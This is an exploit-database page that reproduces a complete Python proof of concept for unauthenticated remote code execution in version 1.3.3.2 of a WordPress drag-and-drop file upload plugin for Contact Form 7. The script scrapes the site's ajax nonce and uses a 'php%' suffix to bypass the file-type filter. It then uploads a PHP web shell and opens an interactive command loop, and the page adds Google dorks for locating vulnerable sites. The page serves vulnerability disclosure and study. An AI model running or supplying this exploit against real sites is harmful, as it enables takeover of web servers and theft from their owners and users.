Search for hundreds of thousands of exploits

"WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution"

Author

Exploit author

"Austin Martin"

Platform

Exploit platform

php

Release date

Exploit published date

2020-05-26

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
# Date: 2020-05-11
# Exploit Author: Austin Martin
# Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/
# Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Vendor Homepage: https://www.codedropz.com/
# Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Version: 1.3.3.2
# Tested on: WordPress 5.4.1, PHP 7.41
# CVE : N/A

# Notes:
# At time of disclosure, the WordPress page listed this plugin being used by +10,000 applications
# Application was patched by vendor within 24 hours of initial disclosure
# This exploit works bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed

# Any file types can be added to the "supported_type"  parameter
# These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/
# Dangerous file types such as php have "_.txt" appended to the end creating a text file
# This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name
# ex. "php%" for file type and "shell.php%" for filename
# The PHP payload in the POC can be easily modified to gain a reverse shell

#!/usr/bin/python
import string
import random
import requests
from bs4 import BeautifulSoup
import sys

payloadurl=""
def RecurseLinks(base,file):

    headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"}
    f = requests.get(base, headers=headers)
    soup = BeautifulSoup(f.content, "html.parser")

    for root in soup.find_all("a"):
        href = root.get("href")
        if (href.startswith("/")):
            do = "nothing"
        elif (href.endswith("/")):
            RecurseLinks(base + href, file)
        else:
            if file in href:
                print ("\n[+] File Found --> " + base + href)
                global payloadurl
                payloadurl = (base+href)

def main():
    #os.system('cls')
    print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution")
    print("@amartinsec --> Twitter\nCVE:2020-12800\n")

    #Build The Request
    #Generate random URL for filename
    file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6))

    urlinput = raw_input("[+] Enter url to the vulnerable WordPress application: ")

    #Finding the nonce used in the Ajax security string
    print ("\n[+] Searching for security string nonce")
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
    homepage = requests.get(urlinput,headers=headers)
    homepage = homepage.text
    homepage = homepage.split("ajax_nonce\":\"",1)[1]
    securitykey = homepage[:10]
    print("[+] Found security string --> " + securitykey)

    url = urlinput + "/wp-admin/admin-ajax.php"

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
                     "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5",
                     "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest",
                     "Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601",
                     }
    data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \
           "php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \
           "5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \
           "dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \
           "\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \
           "\n\r\n" + securitykey +"\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \
           "filename=\"" + file +".php%\"\r\nContent-Type: text/plain\r\n\r\n" \
           "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>" \
           "\r\n-----------------------------350278735926454076983690555601--\r\n"

    print "\n[+] Sending payload to target"

    response = requests.post(url, headers=headers, data=data)

    if "200" in str(response):
        print("[+] Looks like a successful file upload!\n")


    elif "403" in str(response):
        print("\nFile Upload Failed")
        print("403 in response. Check security string")
        sys.exit(1)

    else:
        print("File upload failed. Try the manual way with Burp")
        sys.exit(1)

    print("[+] Crawling for the uploaded file. This may take a minute...")
    print("[+] Searching for " + file + ".php")

    RecurseLinks(urlinput + "/wp-content/uploads/",file)

    if payloadurl == "":
        print("Can't find the file on the web server")
        print("Try the manual method")
        sys.exit(1)

    #If all goes well, we can now send requests for RCE
    print("[+] Success\n")
    while True:
        cmd= raw_input("[+] CMD: ")
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
        request = requests.get(payloadurl + "?e=" + cmd, headers=headers)
        print request.text

if __name__ == "__main__":
    main()
Release DateTitleTypePlatformAuthor
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"BloodX CMS 1.0 - Authentication Bypass"webappsphpBKpatron
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
2020-09-03"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)"webappsphpV1n1v131r4
Release DateTitleTypePlatformAuthor
2020-05-26"WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution"webappsphp"Austin Martin"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48520/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.